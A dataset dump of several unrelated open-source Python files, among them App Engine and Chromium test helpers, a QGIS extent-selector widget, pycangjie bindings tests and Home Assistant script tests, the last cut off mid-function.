text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
# Import py.test hooks and fixtures for App Engine
from gcp.testing.appengine import (
login,
pytest_configure,
pytest_runtest_call,
run_tasks,
testbed)
import six
(login)
(pytest_configure)
(pytest_runtest_call)
(run_tasks)
(testbed)
def pytest_ignore_collect(path, config):
"""Skip App Engine tests in python 3 or if no SDK is available."""
if 'appengine/standard' in str(path):
if six.PY3:
return True
if 'GAE_SDK_PATH' not in os.environ:
return True
return False
| pongem/python-bot-project | appengine/standard/conftest.py | Python | apache-2.0 | 1,150 | 0 |
#!/usr/bin/env python
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unpack_pak
import unittest
class UnpackPakTest(unittest.TestCase):
def testMapFileLine(self):
self.assertTrue(unpack_pak.ParseLine(' {"path.js", IDR_PATH}'))
def testGzippedMapFileLine(self):
self.assertTrue(unpack_pak.ParseLine(' {"path.js", IDR_PATH, false}'))
self.assertTrue(unpack_pak.ParseLine(' {"path.js", IDR_PATH, true}'))
def testGetFileAndDirName(self):
(f, d) = unpack_pak.GetFileAndDirName(
'out/build/gen/foo/foo.unpak', 'out/build/gen/foo', 'a/b.js')
self.assertEquals('b.js', f)
self.assertEquals('out/build/gen/foo/foo.unpak/a', d)
def testGetFileAndDirNameForGeneratedResource(self):
(f, d) = unpack_pak.GetFileAndDirName(
'out/build/gen/foo/foo.unpak', 'out/build/gen/foo',
'@out_folder@/out/build/gen/foo/a/b.js')
self.assertEquals('b.js', f)
self.assertEquals('out/build/gen/foo/foo.unpak/a', d)
if __name__ == '__main__':
unittest.main()
| endlessm/chromium-browser | chrome/browser/resources/unpack_pak_test.py | Python | bsd-3-clause | 1,132 | 0.0053 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
extentSelector.py
---------------------
Date : December 2010
Copyright : (C) 2010 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giuseppe Sucameli'
__date__ = 'December 2010'
__copyright__ = '(C) 2010, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
from ui_extentSelector import Ui_GdalToolsExtentSelector as Ui_ExtentSelector
import GdalTools_utils as Utils
class GdalToolsExtentSelector(QWidget, Ui_ExtentSelector):
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.canvas = None
self.tool = None
self.previousMapTool = None
self.isStarted = False
self.setupUi(self)
self.connect(self.x1CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.x2CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.y1CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.y2CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.btnEnable, SIGNAL("clicked()"), self.start)
def setCanvas(self, canvas):
self.canvas = canvas
self.tool = RectangleMapTool(self.canvas)
self.previousMapTool = self.canvas.mapTool()
self.connect(self.tool, SIGNAL("rectangleCreated()"), self.fillCoords)
self.connect(self.tool, SIGNAL("deactivated()"), self.pause)
def stop(self):
if not self.isStarted:
return
self.isStarted = False
self.btnEnable.setVisible(False)
self.tool.reset()
self.canvas.unsetMapTool(self.tool)
if self.previousMapTool != self.tool:
self.canvas.setMapTool(self.previousMapTool)
#self.coordsChanged()
self.emit( SIGNAL( "selectionStopped()" ) )
def start(self):
prevMapTool = self.canvas.mapTool()
if prevMapTool != self.tool:
self.previousMapTool = prevMapTool
self.canvas.setMapTool(self.tool)
self.isStarted = True
self.btnEnable.setVisible(False)
self.coordsChanged()
self.emit( SIGNAL( "selectionStarted()" ) )
def pause(self):
if not self.isStarted:
return
self.btnEnable.setVisible(True)
self.emit( SIGNAL( "selectionPaused()" ) )
def setExtent(self, rect):
if self.tool.setRectangle(rect):
self.emit( SIGNAL( "newExtentDefined()" ) )
def getExtent(self):
return self.tool.rectangle()
def isCoordsValid(self):
try:
point1 = QgsPoint( float(self.x1CoordEdit.text()), float(self.y1CoordEdit.text()) )
point2 = QgsPoint( float(self.x2CoordEdit.text()), float(self.y2CoordEdit.text()) )
except ValueError:
return False
return True
def coordsChanged(self):
rect = None
if self.isCoordsValid():
point1 = QgsPoint( float(self.x1CoordEdit.text()), float(self.y1CoordEdit.text()) )
point2 = QgsPoint( float(self.x2CoordEdit.text()), float(self.y2CoordEdit.text()) )
rect = QgsRectangle(point1, point2)
self.setExtent(rect)
def fillCoords(self):
rect = self.getExtent()
self.blockSignals(True)
if rect != None:
self.x1CoordEdit.setText( str(rect.xMinimum()) )
self.x2CoordEdit.setText( str(rect.xMaximum()) )
self.y1CoordEdit.setText( str(rect.yMaximum()) )
self.y2CoordEdit.setText( str(rect.yMinimum()) )
else:
self.x1CoordEdit.clear()
self.x2CoordEdit.clear()
self.y1CoordEdit.clear()
self.y2CoordEdit.clear()
self.blockSignals(False)
self.emit( SIGNAL( "newExtentDefined()" ) )
class RectangleMapTool(QgsMapToolEmitPoint):
def __init__(self, canvas):
self.canvas = canvas
QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = QgsRubberBand( self.canvas, True ) # true, its a polygon
self.rubberBand.setColor( Qt.red )
self.rubberBand.setWidth( 1 )
self.reset()
def reset(self):
self.startPoint = self.endPoint = None
self.isEmittingPoint = False
self.rubberBand.reset( True ) # true, its a polygon
def canvasPressEvent(self, e):
self.startPoint = self.toMapCoordinates( e.pos() )
self.endPoint = self.startPoint
self.isEmittingPoint = True
self.showRect(self.startPoint, self.endPoint)
def canvasReleaseEvent(self, e):
self.isEmittingPoint = False
if self.rectangle() != None:
self.emit( SIGNAL("rectangleCreated()") )
def canvasMoveEvent(self, e):
if not self.isEmittingPoint:
return
self.endPoint = self.toMapCoordinates( e.pos() )
self.showRect(self.startPoint, self.endPoint)
def showRect(self, startPoint, endPoint):
self.rubberBand.reset( True ) # true, it's a polygon
if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():
return
point1 = QgsPoint(startPoint.x(), startPoint.y())
point2 = QgsPoint(startPoint.x(), endPoint.y())
point3 = QgsPoint(endPoint.x(), endPoint.y())
point4 = QgsPoint(endPoint.x(), startPoint.y())
self.rubberBand.addPoint( point1, False )
self.rubberBand.addPoint( point2, False )
self.rubberBand.addPoint( point3, False )
self.rubberBand.addPoint( point4, True ) # true to update canvas
self.rubberBand.show()
def rectangle(self):
if self.startPoint == None or self.endPoint == None:
return None
elif self.startPoint.x() == self.endPoint.x() or self.startPoint.y() == self.endPoint.y():
return None
return QgsRectangle(self.startPoint, self.endPoint)
def setRectangle(self, rect):
if rect == self.rectangle():
return False
if rect == None:
self.reset()
else:
self.startPoint = QgsPoint(rect.xMaximum(), rect.yMaximum())
self.endPoint = QgsPoint(rect.xMinimum(), rect.yMinimum())
self.showRect(self.startPoint, self.endPoint)
return True
def deactivate(self):
QgsMapTool.deactivate(self)
self.emit(SIGNAL("deactivated()"))
| bstroebl/QGIS | python/plugins/GdalTools/tools/extentSelector.py | Python | gpl-2.0 | 7,022 | 0.026915 |
import re
class rgxHandler:
# Taken from https://www.safaribooksonline.com/library/view/python-cookbook-2nd/0596007973/ch01s19.html
linetitles = ["product/productId: ", "product/title: ", "product/price: ", "review/userId: ", "review/profileName: ", "review/helpfulness: ", "review/score: ", "review/time: ", "review/summary: ", "review/text: "]
getrids = dict([(linetitles[0],''), (linetitles[1],''), (linetitles[2],''), (linetitles[3],''), (linetitles[4],''), (linetitles[5],''), (linetitles[6],''), (linetitles[7],''), (linetitles[8],''), (linetitles[9],'')])
replace = {"\\":"\\\\", '"':""" }
unreplace = {"\\\\":"\\", """:'"'}
def __init__(self):
pass
def multiple_replace(self, text, adict):
rx = re.compile('|'.join(map(re.escape, adict)))
def one_xlat(match):
return adict[match.group(0)]
return rx.sub(one_xlat, text)
def line_rgx(self, text):
text = text.strip('\n')
text = self.multiple_replace(text, self.getrids)
text = self.multiple_replace(text, self.replace)
return text
def find3OrMore(self, line):
#line = re.sub(""", ' ', line)
line = re.sub(r'([^\s\w]|_)+', ' ', line)
words = line.split()
rtnwords = []
for word in words:
if len(word.strip()) >= 3:
rtnwords.append(word.strip().lower())
return rtnwords
def putLineTitlesBack(self, review):
rtnlines = []
iter = re.finditer('"', review)
quotes = [m.start(0) for m in iter]
iter = re.finditer(',', review)
commas = [m.start(0) for m in iter]
q = 0
c = 0
i = 0
while(True):
#print(str(i))
#print("c: " + str(c) + "/" + str(len(commas)) + " " + str(commas[c]))
#print("q: " + str(q) + "/" + str(len(quotes)) + " " + str(quotes[q]))
if commas[c] < quotes[q] and ((c+1) < len(commas)):
if c == 0:
#print(review[0:commas[c]] + '\n')
rtnlines.append(review[0:commas[c]] + '\n')
else:
if quotes[q-1] > commas[c-1]:
pass
else:
#print(review[commas[c-1]+1:commas[c]] + '\n')
rtnlines.append(review[commas[c-1]+1:commas[c]] + '\n')
c += 1
elif (commas[c] > quotes[q] and commas[c] < quotes[q+1]) or ((c+1) == len(commas)):
#print(review[quotes[q]+1:quotes[q+1]] + '\n')
rtnlines.append(review[quotes[q]+1:quotes[q+1]] + '\n')
if q+1 == len(quotes)-1:
break
while commas[c] < quotes[q+1]:
c += 1
q+=2
else:
#print(review[quotes[q]+1:quotes[q+1]] + '\n')
rtnlines.append(review[quotes[q]+1:quotes[q+1]] + '\n')
q+=2
if q == len(quotes):
break
i += 1
i = 0
for line in rtnlines:
line = self.multiple_replace(line.strip('"'), self.unreplace)
rtnlines[i] = self.linetitles[i] + line + '\n'
i += 1
return rtnlines
| quentinlautischer/291MiniProject2 | src/rgxHandler.py | Python | apache-2.0 | 3,349 | 0.01284 |
#!/Users/patron/Desktop/maps/django-project/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| abzaloid/maps | django-project/bin/django-admin.py | Python | mit | 161 | 0 |
# Copyright (c) 2013 - The pycangjie authors
#
# This file is part of pycangjie, the Python bindings to libcangjie.
#
# pycangjie is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pycangjie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pycangjie. If not, see <http://www.gnu.org/licenses/>.
import itertools
import operator
import string
import subprocess
import unittest
import cangjie
class MetaTest(type):
"""Metaclass for our test cases
The goal is to provide every TestCase class with methods like test_a(),
test_b(), etc..., in other words, one method per potential Cangjie input
code.
Well, not quite, because that would be 12356630 methods (the number of
strings composed of 1 to 5 lowercase ascii letters), and even though my
laptop has 8Go of RAM, the test process gets killed by the OOM killer. :)
So we cheat, and use libcangjie's wildcard support, so that we only
generate 26 + 26^2 = 702 methods.
"""
def __init__(cls, name, bases, dct):
super(MetaTest, cls).__init__(name, bases, dct)
def gen_codes():
"""Generate the 702 possible input codes"""
# First, the 1-character codes
for c in string.ascii_lowercase:
yield c
# Next, the 2-characters-with-wildcard codes
for t in itertools.product(string.ascii_lowercase, repeat=2):
yield '*'.join(t)
def tester(code):
def func(cls):
return cls.run_test(code)
return func
# Generate the test_* methods
for code in gen_codes():
setattr(cls, "test_%s" % code.replace("*", ""), tester(code))
class BaseTestCase(unittest.TestCase):
"""Base test class, grouping the common stuff for all our unit tests"""
def __init__(self, name):
super().__init__(name)
self.cli_cmd = ["/usr/bin/libcangjie_cli"] + self.cli_options
self.language = (cangjie.filters.BIG5 | cangjie.filters.HKSCS |
cangjie.filters.PUNCTUATION |
cangjie.filters.CHINESE |
cangjie.filters.ZHUYIN | cangjie.filters.KANJI |
cangjie.filters.KATAKANA |
cangjie.filters.HIRAGANA |
cangjie.filters.SYMBOLS)
def setUp(self):
self.cj = cangjie.Cangjie(self.version, self.language)
def tearDown(self):
del self.cj
def run_command(self, cmd):
"""Run a command, deal with errors, and return its stdout"""
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
try:
cangjie.errors.handle_error_code(proc.returncode,
msg="Unknown error while running"
" libcangjie_cli (%d)"
% proc.returncode)
except cangjie.errors.CangjieNoCharsError:
return ""
try:
return out.decode("utf-8")
except UnicodeDecodeError:
# Python's 'utf-8' codec trips over b"\xed\xa1\x9d\xed\xbc\xb2",
# but according to [1] and [2], it is a valid sequence of 2 chars:
# U+D85D \xed\xa1\x9d
# U+DF32 \xed\xbc\xb2
# [1] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=55389&utf8=string-literal
# [2] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=57138&utf8=string-literal
# TODO: Investigate this further, and eventually open a bug report
out2 = []
for line in out.split("\n".encode("utf-8")):
try:
out2.append(line.decode("utf-8"))
except UnicodeDecodeError:
pass
return "\n".join(out2)
def run_test(self, input_code):
"""Run the actual test
This compares the output of the libcangjie_cli tool with the output
from pycangjie.
The idea is that if pycangjie produces the same results as a C++ tool
compiled against libcangjie, then pycangjie properly wraps libcangjie.
We do not try to verify that pycangjie produces valid results here,
validity is to be checked in libcangjie.
Note that this whole test is based on scraping the output of
libcangjie_cli, which is quite fragile.
"""
# Get a list of CangjieChar from libcangjie_cli as a reference
tmp_expected = self.run_command(self.cli_cmd+[input_code]).split("\n")
tmp_expected = map(lambda x: x.strip(" \n"), tmp_expected)
tmp_expected = filter(lambda x: len(x) > 0, tmp_expected)
expected = []
for item in tmp_expected:
chchar, simpchar, code, frequency = item.split(", ")
chchar = chchar.split(": ")[-1].strip("'")
simpchar = simpchar.split(": ")[-1].strip("'")
code = code.split(": ")[-1].strip("'")
frequency = int(frequency.split(" ")[-1])
expected.append(cangjie._core.CangjieChar(chchar.encode("utf-8"),
simpchar.encode("utf-8"),
code.encode("utf-8"),
frequency))
expected = sorted(expected, key=operator.attrgetter('chchar', 'code'))
try:
# And compare with what pycangjie produces
results = sorted(self.cj.get_characters(input_code),
key=operator.attrgetter('chchar', 'code'))
self.assertEqual(results, expected)
except cangjie.errors.CangjieNoCharsError:
self.assertEqual(len(expected), 0)
| Cangjians/pycangjie | tests/__init__.py | Python | lgpl-3.0 | 6,379 | 0.000314 |
#!/usr/bin/env python
# -*- coding: utf8 -*-
import xml.etree.ElementTree as ET
from pprint import pprint
filename = 'GeoLogger.gpx'
def main():
tree = ET.parse(filename)
root = tree.getroot()
pprint(root.tag)
pprint(root.attrib)
pprint(root.findtext('.'))
if __name__ == "__main__":
main()
| TheShellLand/pies | v3/Libraries/xml/xml-parse.py | Python | mit | 321 | 0 |
"""The tests for the Script component."""
# pylint: disable=protected-access
import asyncio
from contextlib import contextmanager
from datetime import timedelta
import logging
from unittest import mock
import pytest
import voluptuous as vol
# Otherwise can't test just this file (import order issue)
from homeassistant import exceptions
import homeassistant.components.scene as scene
from homeassistant.const import ATTR_ENTITY_ID, SERVICE_TURN_ON
from homeassistant.core import Context, CoreState, callback
from homeassistant.helpers import config_validation as cv, script
from homeassistant.helpers.event import async_call_later
import homeassistant.util.dt as dt_util
from tests.async_mock import patch
from tests.common import (
async_capture_events,
async_fire_time_changed,
async_mock_service,
)
ENTITY_ID = "script.test"
@pytest.fixture
def mock_timeout(hass, monkeypatch):
"""Mock async_timeout.timeout."""
class MockTimeout:
def __init__(self, timeout):
self._timeout = timeout
self._loop = asyncio.get_event_loop()
self._task = None
self._cancelled = False
self._unsub = None
async def __aenter__(self):
if self._timeout is None:
return self
self._task = asyncio.Task.current_task()
if self._timeout <= 0:
self._loop.call_soon(self._cancel_task)
return self
# Wait for a time_changed event instead of real time passing.
self._unsub = async_call_later(hass, self._timeout, self._cancel_task)
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if exc_type is asyncio.CancelledError and self._cancelled:
self._unsub = None
self._task = None
raise asyncio.TimeoutError
if self._timeout is not None and self._unsub:
self._unsub()
self._unsub = None
self._task = None
return None
@callback
def _cancel_task(self, now=None):
if self._task is not None:
self._task.cancel()
self._cancelled = True
monkeypatch.setattr(script, "timeout", MockTimeout)
def async_watch_for_action(script_obj, message):
"""Watch for message in last_action."""
flag = asyncio.Event()
@callback
def check_action():
if script_obj.last_action and message in script_obj.last_action:
flag.set()
script_obj.change_listener = check_action
return flag
async def test_firing_event_basic(hass):
"""Test the firing of events."""
event = "test_event"
context = Context()
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA({"event": event, "event_data": {"hello": "world"}})
script_obj = script.Script(hass, sequence)
await script_obj.async_run(context=context)
await hass.async_block_till_done()
assert len(events) == 1
assert events[0].context is context
assert events[0].data.get("hello") == "world"
async def test_firing_event_template(hass):
"""Test the firing of events."""
event = "test_event"
context = Context()
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
{
"event": event,
"event_data_template": {
"dict": {
1: "{{ is_world }}",
2: "{{ is_world }}{{ is_world }}",
3: "{{ is_world }}{{ is_world }}{{ is_world }}",
},
"list": ["{{ is_world }}", "{{ is_world }}{{ is_world }}"],
},
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run({"is_world": "yes"}, context=context)
await hass.async_block_till_done()
assert len(events) == 1
assert events[0].context is context
assert events[0].data == {
"dict": {1: "yes", 2: "yesyes", 3: "yesyesyes"},
"list": ["yes", "yesyes"],
}
async def test_calling_service_basic(hass):
"""Test the calling of a service."""
context = Context()
calls = async_mock_service(hass, "test", "script")
sequence = cv.SCRIPT_SCHEMA({"service": "test.script", "data": {"hello": "world"}})
script_obj = script.Script(hass, sequence)
await script_obj.async_run(context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data.get("hello") == "world"
async def test_calling_service_template(hass):
"""Test the calling of a service."""
context = Context()
calls = async_mock_service(hass, "test", "script")
sequence = cv.SCRIPT_SCHEMA(
{
"service_template": """
{% if True %}
test.script
{% else %}
test.not_script
{% endif %}""",
"data_template": {
"hello": """
{% if is_world == 'yes' %}
world
{% else %}
not world
{% endif %}
"""
},
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run({"is_world": "yes"}, context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data.get("hello") == "world"
async def test_multiple_runs_no_wait(hass):
"""Test multiple runs with no wait in script."""
logger = logging.getLogger("TEST")
calls = []
heard_event = asyncio.Event()
async def async_simulate_long_service(service):
"""Simulate a service that takes a not insignificant time."""
fire = service.data.get("fire")
listen = service.data.get("listen")
service_done = asyncio.Event()
@callback
def service_done_cb(event):
logger.debug("simulated service (%s:%s) done", fire, listen)
service_done.set()
calls.append(service)
logger.debug("simulated service (%s:%s) started", fire, listen)
unsub = hass.bus.async_listen(listen, service_done_cb)
hass.bus.async_fire(fire)
await service_done.wait()
unsub()
hass.services.async_register("test", "script", async_simulate_long_service)
@callback
def heard_event_cb(event):
logger.debug("heard: %s", event)
heard_event.set()
sequence = cv.SCRIPT_SCHEMA(
[
{
"service": "test.script",
"data_template": {"fire": "{{ fire1 }}", "listen": "{{ listen1 }}"},
},
{
"service": "test.script",
"data_template": {"fire": "{{ fire2 }}", "listen": "{{ listen2 }}"},
},
]
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
# Start script twice in such a way that second run will be started while first run
# is in the middle of the first service call.
unsub = hass.bus.async_listen("1", heard_event_cb)
logger.debug("starting 1st script")
hass.async_create_task(
script_obj.async_run(
{"fire1": "1", "listen1": "2", "fire2": "3", "listen2": "4"}
)
)
await asyncio.wait_for(heard_event.wait(), 1)
unsub()
logger.debug("starting 2nd script")
await script_obj.async_run(
{"fire1": "2", "listen1": "3", "fire2": "4", "listen2": "4"}
)
await hass.async_block_till_done()
assert len(calls) == 4
async def test_activating_scene(hass):
"""Test the activation of a scene."""
context = Context()
calls = async_mock_service(hass, scene.DOMAIN, SERVICE_TURN_ON)
sequence = cv.SCRIPT_SCHEMA({"scene": "scene.hello"})
script_obj = script.Script(hass, sequence)
await script_obj.async_run(context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data.get(ATTR_ENTITY_ID) == "scene.hello"
@pytest.mark.parametrize("count", [1, 3])
async def test_stop_no_wait(hass, count):
"""Test stopping script."""
service_started_sem = asyncio.Semaphore(0)
finish_service_event = asyncio.Event()
event = "test_event"
events = async_capture_events(hass, event)
async def async_simulate_long_service(service):
"""Simulate a service that takes a not insignificant time."""
service_started_sem.release()
await finish_service_event.wait()
hass.services.async_register("test", "script", async_simulate_long_service)
sequence = cv.SCRIPT_SCHEMA([{"service": "test.script"}, {"event": event}])
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=count)
# Get script started specified number of times and wait until the test.script
# service has started for each run.
tasks = []
for _ in range(count):
hass.async_create_task(script_obj.async_run())
tasks.append(hass.async_create_task(service_started_sem.acquire()))
await asyncio.wait_for(asyncio.gather(*tasks), 1)
# Can't assert just yet because we haven't verified stopping works yet.
# If assert fails we can hang test if async_stop doesn't work.
script_was_runing = script_obj.is_running
were_no_events = len(events) == 0
# Begin the process of stopping the script (which should stop all runs), and then
# let the service calls complete.
hass.async_create_task(script_obj.async_stop())
finish_service_event.set()
await hass.async_block_till_done()
assert script_was_runing
assert were_no_events
assert not script_obj.is_running
assert len(events) == 0
async def test_delay_basic(hass, mock_timeout):
"""Test the delay."""
delay_alias = "delay step"
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": 5}, "alias": delay_alias})
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, delay_alias)
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == delay_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
assert script_obj.last_action is None
async def test_multiple_runs_delay(hass, mock_timeout):
"""Test multiple runs with delay in script."""
event = "test_event"
events = async_capture_events(hass, event)
delay = timedelta(seconds=5)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"delay": delay},
{"event": event, "event_data": {"value": 2}},
]
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[-1].data["value"] == 1
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
# Start second run of script while first run is in a delay.
script_obj.sequence[1]["alias"] = "delay run 2"
delay_started_flag = async_watch_for_action(script_obj, "delay run 2")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
async_fire_time_changed(hass, dt_util.utcnow() + delay)
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 4
assert events[-3].data["value"] == 1
assert events[-2].data["value"] == 2
assert events[-1].data["value"] == 2
async def test_delay_template_ok(hass, mock_timeout):
"""Test the delay as a template."""
sequence = cv.SCRIPT_SCHEMA({"delay": "00:00:{{ 5 }}"})
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
async def test_delay_template_invalid(hass, caplog):
"""Test the delay as a template that fails."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{"delay": "{{ invalid_delay }}"},
{"delay": {"seconds": 5}},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
start_idx = len(caplog.records)
await script_obj.async_run()
await hass.async_block_till_done()
assert any(
rec.levelname == "ERROR" and "Error rendering" in rec.message
for rec in caplog.records[start_idx:]
)
assert not script_obj.is_running
assert len(events) == 1
async def test_delay_template_complex_ok(hass, mock_timeout):
"""Test the delay with a working complex template."""
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": "{{ 5 }}"}})
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
async def test_delay_template_complex_invalid(hass, caplog):
"""Test the delay with a complex template that fails."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{"delay": {"seconds": "{{ invalid_delay }}"}},
{"delay": {"seconds": 5}},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
start_idx = len(caplog.records)
await script_obj.async_run()
await hass.async_block_till_done()
assert any(
rec.levelname == "ERROR" and "Error rendering" in rec.message
for rec in caplog.records[start_idx:]
)
assert not script_obj.is_running
assert len(events) == 1
async def test_cancel_delay(hass):
"""Test the cancelling while the delay is present."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA([{"delay": {"seconds": 5}}, {"event": event}])
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 0
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
await script_obj.async_stop()
assert not script_obj.is_running
# Make sure the script is really stopped.
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 0
async def test_wait_template_basic(hass):
"""Test the wait template."""
wait_alias = "wait step"
sequence = cv.SCRIPT_SCHEMA(
{
"wait_template": "{{ states.switch.test.state == 'off' }}",
"alias": wait_alias,
}
)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, wait_alias)
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == wait_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert script_obj.last_action is None
async def test_multiple_runs_wait_template(hass):
"""Test multiple runs with wait_template in script."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
]
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[-1].data["value"] == 1
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
# Start second run of script while first run is in wait_template.
hass.async_create_task(script_obj.async_run())
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 4
assert events[-3].data["value"] == 1
assert events[-2].data["value"] == 2
assert events[-1].data["value"] == 2
async def test_cancel_wait_template(hass):
"""Test the cancelling while wait_template is present."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 0
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
await script_obj.async_stop()
assert not script_obj.is_running
# Make sure the script is really stopped.
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 0
async def test_wait_template_not_schedule(hass):
"""Test the wait template with correct condition."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{"wait_template": "{{ states.switch.test.state == 'on' }}"},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
hass.states.async_set("switch.test", "on")
